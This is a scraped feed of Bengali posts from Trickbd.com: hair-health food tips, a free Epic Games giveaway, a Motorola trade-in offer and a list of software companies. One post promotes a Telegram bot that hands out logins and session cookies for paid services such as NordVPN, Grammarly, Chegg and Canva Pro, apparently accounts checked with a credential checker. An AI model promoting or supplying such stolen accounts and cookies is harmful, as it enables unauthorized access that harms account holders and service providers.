সেলেনিয়াম চুলের জন্য অত্যান্ত গুরুত্বপূর্ণ একটি উপাদান।এটি বিদ্ধামান থাকলে চুল এর খুকশি থেকে রক্ষা করবে।মাথা ময়লা আটকিবে না ঘাম হবে না,ফলে মাথার ত্বক ভাল থাকবে।

৩] চুলের পুরুত্ব বাড়াতে ( গোটা খাদ্য)

গোটা খাদ্যে জিংক বি,ভিটামিনে আয়রন পাবেন।চুলের স্বস্থের অন্যতম উপাদান হলো জিংক।যেটা চুলের হরমোনকে নিয়ন্ত্রিত করে ও চুলের পুরুত্ব বাড়তে অত্যান্ত সাহায্য করে।
গোটা খাদ্যে অনেক ভাল পরিমান পুস্টিগুন রয়েছে।

৪] চুলের বৃদ্ধির জন্য ( দুগ্ধজাত খাবার)

প্রোটিন পাওয়া সহজ উপায় হলো, ডায়েট পনির ও দইয়ের অন্তর্ভুক্ত।
চুলের গঠন বেশির ভাগ ই হয় প্রোটিন দ্বারা।
তাই দুগ্ধজাত খাবার খেলে চুলের বৃদ্ধি পায়।
চুলের বৃদ্ধির জন্য দুগ্ধজাত খাবার এর বিকল্প নেই।

৫] চুল পড়া বন্ধ করতে ( তৈলাক্ত মাছ)

তৈলাক্ত মাছে রয়েছে ফ্যাটি এসিড।যা চুল পড়া বন্ধ করতে সাহায্য করে। তৈলাক্ত কাছে আরো বিভিন্ন উপাদা রয়েছে, চুল এর জন্য অত্যান্ত উপকারি।চুল পড়া বন্ধ করতে অত্যান্ত ভূমিকা পালন করে এই তৈলাক্ত মাছ।
খাবার তালিকায়, রাখা উচিৎ এইব তৈলাক্ত মাছ।এতে চুল এর জন্য অত্যান্ত ভাল ও উপকারি।

আশা করি আপনাদের ভাল লেগেছে।

আজ এ পযন্ত,
ক্ষুদ্র ক্ষুদ্র জ্ঞান আপনাদের মাঝে তুলে ধরার চেস্টা করি।
পরবর্তী ট্রিক এর জন্য অপেক্ষা করুন, আবারো ভাল কিছু নিয়ে হাজির হবো।
সে পযন্ত ভাল থাকুন,সুস্থ থাকুন।

আপনাদের বিন্দুমাত্র উপকার হলে,আমার ইউটিউব চ্যানেলটি সাবস্ক্রাইব করবেনঃ

Youtube Channel
যে কোনো প্রয়োজনে আমার সাথে ফেসবুকে যোগাযোগ করতে চাইলেঃ- Sk Shipon

ধন্যবাদ

The post চুলের জন্য অত্যান্ত গুরুত্বপূর্ণ পাঁচটি খাবার সম্পর্কে জেনে নিন। appeared first on Trickbd.com.

Sunless Sea ফ্রি Epic Game মার্চের ০৪ তারিখ পর্যন্ত

Posted:

Epic Games প্রত্যেকবারই Freeতে (0$) Game Giveaway করে থাকে, তবে নির্দিষ্ট সময় পর পর। এইবার তারা Sunless Sea Gameটি Free তে Download করার সুযোগ দিচ্ছে।

 

Game Video

 

Specifications:-(WINDOWS)

Minimum

OS-Windows XP or later
Processor-2Ghz or better
Memory-1 GB RAM
Storage-700 MB available space
Direct X-Version 9.0c
Graphics-1280×768 minimum resolution, DirectX 9.0c compatible graphics card

Recommended

OS-Windows XP or later
Processor-2Ghz or better
Memory-1 GB RAM
Storage-700 MB available space
Direct X-Version 9.0c
Graphics-1280×768 minimum resolution, DirectX 9.0c compatible graphics card

 

Languages Supported

English

 

 

Install Process:-

#প্রথমে এই Link এ প্রবেশ করুন
#GET Option এ Click করুন
#তারপর Epic games এ Log in/Sign up করুন এবং Place Order Select করুন
#Successful Order দেখাবে
#Game Download Link/ Epic Launcher এ Game Start হবে

Mail me-
dex477604@gmail.com

The post Sunless Sea ফ্রি Epic Game মার্চের ০৪ তারিখ পর্যন্ত appeared first on Trickbd.com.

Introducing A Telegram B.O.T, যা বিভিন্ন Premium Account Generate করতে পারে

Posted:

Howdy Everyone
Telegram বর্তমানে অধিক জনপ্রিয় Social Platform এ রূপান্তরিত হতে সক্ষম হয়েছে। আর আমি এই Platform এ আছি Trickbd তে যখন থেকে Content লেখা শুরু করেছি। আজকে মূলত একটি Telegram B.O.T এর সাথে পরিচয় করিয়ে দিব, যা বিভিন্ন Premium Account Provide করতে সক্ষম।

 

🔰Telegram B.O.T. Details🔰

🎥 Demo Video

 

 

B.O.T Link
http://telegram.me/Generate_shakib_bot
@Generate_shakib_bot*শুধুমাত্র Telegram Userরা Browse করতে পারবেন

যেসকল Premium Account Add করা হয়েছে

  • NordVPN
  • Envato
  • Grammarly
  • Skillshare
  • PluralSight
  • ShutterStock
  • Freepik
  • Camscanner
  • Uplay
  • ErosNow
  • Crunchyroll
  • ExpressVPn
  • VyperVPN
  • Chegg
  • Picsart-Gold
  • Canva Pro

-Optionগুলো একাধিক বার Tap করলে New Account পাবেন প্রতিবার

-আর Cookies দিয়েছি কিছু Account এর, Account স্বল্পতার কারণে
(Cookies Androaid + Pc তে ব্যবহার যোগ্য)

-এই B.O.T এর যেকোন Issue হলে সরাসরি যোগাযোগ @SHAKIB0152Bot(Telegram)

BUG:-
এখন পর্যন্ত একটা সাধারণ Issue খুজে পেয়েছি তা হল Internet Speed এর উপর B.O.T এ Reply Speed Depend করবে, যদি Reply Slow/ দেরিতে পান তবে অধৈর্য না হয়ে 2/3 ঘন্টা পর B.O.T টি Use করুন

 

Conclusion-
-প্রত্যেকটা Account Checker Use করে B.O.T এ Import করা, তাই Account কাজ করে না বলার সুযোগ নেই।
-তারপরও যদি Password Wrong/ Can’t Log In Problem Face করে তবে ধৈর্য দরুন প্রত্যেক সপ্তাহের শুক্রবার Account Upgrade করা হবে
-এবং কোন Account টি কাজ করছে না তা ScreenShot তুলে @SHAKIB0152Bot এইখানে Send করুন

Bye
Contact Me On Telegram[@sakib0152] এবং ভিজিট করুন

The post Introducing A Telegram B.O.T, যা বিভিন্ন Premium Account Generate করতে পারে appeared first on Trickbd.com.

যে কোনো ব্রান্ডের নতুন বা পুরাতন ফোন এক্সচেঞ্জ করে নিয়ে নিন ব্রান্ড নিউ মটোরোলা ফোন

Posted:

আসসালামু আলাইকুম আশা করি সবাই ভালো আছেন। আমিএ ভালো আছি। চলুন আজকের টপিকে কথা বলা যাক,

এক্সচেঞ্জ কি?
দরুন আপনার কাছে কোনো একটা পুরাতন জিনিস আছে আপনি ওইটা কোনো এক্সচেঞ্জ প্রতিষ্ঠানকে দিলেন প্রতিষ্ঠান আপনার পুরাতন জিনিস দেখে একটা দাম বলে দিবে আপনার দাম ভালো লাগলো। ধরুন সেটা ১০ হাজার টাকা। এবার আপনি তার প্রতিষ্ঠান হতে ১৫হাজার টাকার নতুন কোনো জিনিস নিতে চাইলে আপনি আরো ৫ হাজার টাকা দিয়ে নতুন জিনিস বা পণ্যটি নিতে পারবেন। এটাই এক্সচেঞ্জ।

হ্যা ভাই যে কোনো ব্রান্ডের ফোন এক্সচেঞ্জ করে নতুন মটোরোলা ফোন নিতে পারবেন Zingo থেকে। আমিও এমন টাইটেল দেখে ভাবছিলাম আমার সিম্ফনি ফোন টা যদি এক্সচেঞ্জ করতে পারি তাহলে কতই না দারুন ব্যাপার হয়। তবে আমি আসলে টাইটেল বুঝি নি। তারা আসলে যে কোনো ব্রান্ড বলতে টপ লেভেল ব্রান্ড এর ফোন গুলো গ্রহণ করে।

এই অফার চলবে ৩০শে মার্চ পর্যন্ত।

আর পুরাতন ফোনের ক্যাশ ম্যামো ও বক্স দিতে পারলে এক্সটা ডিসকাউন্ট পাবেন। আর এগুলা না থাকলে আপনার ভোটার আইডি কার্ড এর ফোটো কপি দিয়ে এক্স করতে পারবেন কিন্তু ডিসকাউন্ট পাবেন না।

আরো বিস্তারিত নিচের লিংকে
বিস্তারিত

Zingo Fb Link :
Zingo

আমার ট্রিকবিডিতে আরো পোস্টঃ
এবার HSC প্রস্তুতি নিন টেন মিনিট স্কুলের সাথে

৯০% ছাড়ে টেন মিনিট স্কুলের ৯,৫০০ টাকার SSC Crush Course করুন মাত্র ৯,৫০ টাকায়

হ্যাকস বান্ডলঃ একটির দামে ৩টি বই!

যারা টেন মিনিট স্কুলের কোর্স ও বই গুলো আপটু ৯০% ডিসকাউন্টে নিতে চান তারা আমার সাইটে প্রবেশ করুন।
বিকল্প বিদ্যালয়

The post যে কোনো ব্রান্ডের নতুন বা পুরাতন ফোন এক্সচেঞ্জ করে নিয়ে নিন ব্রান্ড নিউ মটোরোলা ফোন appeared first on Trickbd.com.

আধুনিক যুগে তথ্য প্রযুক্তিকে আর সহজ করার জন্য যে ৬টি বিশ্বের সেরা সফ্টওয়্যার কোম্পানি কাজ করে যাচ্ছে।

Posted:

আসসালামু আলাইকুম সবাই কেমন আছেন…..? আশা করি সবাই ভালো আছেন । আমি আল্লাহর রহমতে ভালোই আছি ।আসলে কেউ ভালো না থাকলে TrickBD তে ভিজিট করেনা ।তাই আপনাকে TrickBD তে আসার জন্য ধন্যবাদ ।ভালো কিছু জানতে সবাই TrickBD এর সাথেই থাকুন ।

৬টি বিশ্বের সেরা সফ্টওয়্যার কোম্পানি

বর্তমানে এই আধুনিক যুগে আমরা প্রযুক্তির সাথে সম্পন্ন ভাবে যুক্ত। আমরা যে মোবাইল বা কম্পিউটার ব্যবহার করি এটি কিন্তু এমনি এমনি চলেনা। এটিকে চালানোর জন্য নির্দেশনা দেওয়া হয় আর এই নির্দেশনা দেয় সফ্টওয়্যার। আমরা যে মোবাইল ফোন ব্যবহার করি সেটাও সফ্টওয়্যার নির্দেশনার চলে।

প্রযুক্তির সাথে সফ্টওয়্যার বিবর্তনের সাথে সাথে মানুষের জীবন যাপন ও পরিবর্তন হচ্ছে। একটি সফ্টওয়্যার সাধারণভাবে অ্যাক্সেস করা নতুন কোন বিষয় নয়। এগুলো বছরের পর বছর ধরে পরিবর্তন হচ্ছে। এগুলো ব্যবহার সমাজ ও ব্যবসার বিশাল। সফ্টওয়্যার সংস্থাগুলি বিভিন্ন ব্যবসায়িক মডেলগুলিতে কাজ করছে এবং আর নতুন নতুন পণ্য ও পরিসেবা সরবরাহ করছে।

তারা সফ্টওয়্যার গুলোতে প্রোগ্রামিংয়ের নির্দেশাবলী এবং ডেটা অন্তর্ভুক্ত করে থাকে যা কম্পিউটারকে জানায় যে কীভাবে বিভিন্ন কার্য সম্পাদন করতে হয়।সফ্টওয়্যার বিকাশ সংস্থাগুলি সাধারণত ওয়েব মোবাইল এবং কাস্টম সফ্টওয়্যার ডেভলপমেন্ট পরিষেবা সরবরাহ করে।এরকমি বিশ্বের সেরা ৬টি সফ্টওয়্যার সংস্থাগুলি আমাদের ভবিষ্যতকে নতুন রূপদান করছে।

১. মাইক্রোসফ্ট

ওয়াশিংটনের রেডমন্ডে সদর দফতর মাইক্রোসফ্ট বিশ্বের অন্যতম বৃহৎ সফটওয়্যার সংস্থা।মাইক্রোসফ্ট নামেন এই সংস্থাটি কম্পিউটার সফটওয়্যার,ইলেক্ট্রনিক্স পিসি, উৎপাদন লাইসেন্সিং সমর্থন এবং বিক্রয় করার জন্য সবচেয়ে বেশি পরিচিত।মাইক্রোসফ্ট উইন্ডোজ অপারেটিং সিস্টেমের কথা তো আপনি শুনেই থাকবেন। এই অপারেটিং সিস্টেম লাইন মাইক্রোসফ্ট অফিস স্যুট, ইন্টারনেট এক্সপ্লোরার এবং এজ ওয়েব ব্রাউজারগুলি অন্তর্ভুক্ত রয়েছে। ২০১৯ এর তথ্যের ভিত্তিতে এই কোম্পানিটির মোট আয় ১২৫ বিলিয়ন মার্কিন ডলার।

২. মেরিক্সস্টুডিও


১৯৯৯ সালে প্রতিষ্ঠিত। পোল্যান্ডে অবস্থিত মেরিক্সস্টুডিও একটি সফ্টওয়্যার বিকাশকারী সংস্থা।এই কোম্পানির কাজ হচ্ছে উচ্চমানের এবং পারফরম্যান্ট কাস্টম ওয়েব অ্যাপ্লিকেশন এবং বিশ্বব্যাপী ক্লায়েন্টগুলিতে মোবাইল অ্যাপ্লিকেশন সরবরাহ করা।কাজ গুলো হচ্ছে কাস্টম সফটওয়্যার ডেভলপমেন্ট, ওয়েব ডেভেলপমেন্ট, মোবাইল ডেভেলপমেন্ট, প্রোডাক্ট ডিজাইন ইউএক্স ইউআই, কোয়ালিটি অ্যাসিওরেন্স ডিভোপস।এই সমস্ত কাজ করে থাকে মেরিক্সস্টুডিও কোম্পানি।

৩. এক্সপেরিয়েন্স টেকনোলজি

এই কোম্পানিটি ১৫ বছরেরও বেশি দক্ষতার সাথে এবং ৩২ টি দেশে ৩০০০ টিরও বেশি গ্রাহক এক্সপেরিয়েন্স একটি আইটি সমাধান এবং পরিষেবাদি সংস্থা।পরিবহন এবং আর্থিক পরিষেবা মতোর শিল্প ডোমেনগুলির জন্য কাস্টম সফ্টওয়্যার অ্যাপ্লিকেশন এবং পণ্যগুলি বিকাশের জন্য এক্সপেরিয়েন্স ডিজিটাল শক্তি প্রয়োগ করে।

৪. টিসিএস

টিসিএস হলো একটি ভারতীয় বহুজাতিক তথ্য প্রযুক্তি পরিষেবা।টাটা গ্রুপের সহায়ক সংস্থা এবং ৪৬ টি দেশে কাজ করে টিসিএসের সফটওয়্যার ডেভলপমেন্ট,এবং ব্যবসায়িক প্রক্রিয়া সম্পর্কিত অনেকগুলি কার্যকরী ডোমেন রয়েছে। সংস্থাটি এপ্রিল ২০১৮ এই ইউএস। ১০০ বিলিয়ন মার্কিন বাজারের মূলধন পৌঁছানোর প্রথম ভারতীয় আইটি সংস্থা হয়ে উঠেছে।

৫. ইটিয়াম

ইটিয়াম একটি সফ্টওয়্যার ডেভলপমেন্ট সংস্থা যা ২০০৯ সালে প্রতিষ্ঠিত হয়।এটি তৈরি করে বিশ্ব মানের অ্যাপ্লিকেশনগুলি ছাড়াই তার অংশীদারদের মান বাড়ানোর জন্য তার অভিজ্ঞতা ব্যবহার করে।ইটিয়াম পণ্য তৈরি করতে এবং ক্লায়েন্টকে অগ্রগতি প্রতিবেদন সরবরাহ করে থাকে। সংস্থাটি ব্যবসায় বিশ্লেষণ ডিজাইন, প্রকল্প পরিচালনা থেকে শুরু করে উন্নয়ন, পরীক্ষা, সহায়তা এবং রক্ষণাবেক্ষণ পর্যন্ত পুরো সফটওয়্যার ইঞ্জিনিয়ারিং পরিষেবা সরবরাহ করে।

৬. সফটল্যাবস গ্রুপ

এটি ২০০৩ সালে প্রতিষ্ঠিত হয় ভারতে।শীর্ষস্থানীয় সফটওয়্যার বিকাশকারী সংস্থাগুলির মধ্যে একটি।সংস্থার অভিজ্ঞ এবং প্রতিভাবান দল বিকাশকারীরা ব্যবসায়ের চাহিদা অনুযায়ী ক্লায়েন্টদের জন্য সর্বোত্তম সমাধান তৈরি করে। তারা উদ্ভাবনী ধারণা ব্যবহার করে তার ক্লায়েন্টদের ব্যবসায়ের মান তৈরি করে ব্যবসাকে নতুন উচ্চতা অর্জনে সাহায্য করে থাকে।

আশা করি সবাই সবকিছু বুঝতে পেরেছেন। কোথাও সমস্যা হলে কমেন্ট করে জানাবেন অথবা ফেসবুকে জানাতে পারেন ফেসবুকে আমি

The post আধুনিক যুগে তথ্য প্রযুক্তিকে আর সহজ করার জন্য যে ৬টি বিশ্বের সেরা সফ্টওয়্যার কোম্পানি কাজ করে যাচ্ছে। appeared first on Trickbd.com.

Post a Comment

0 Comments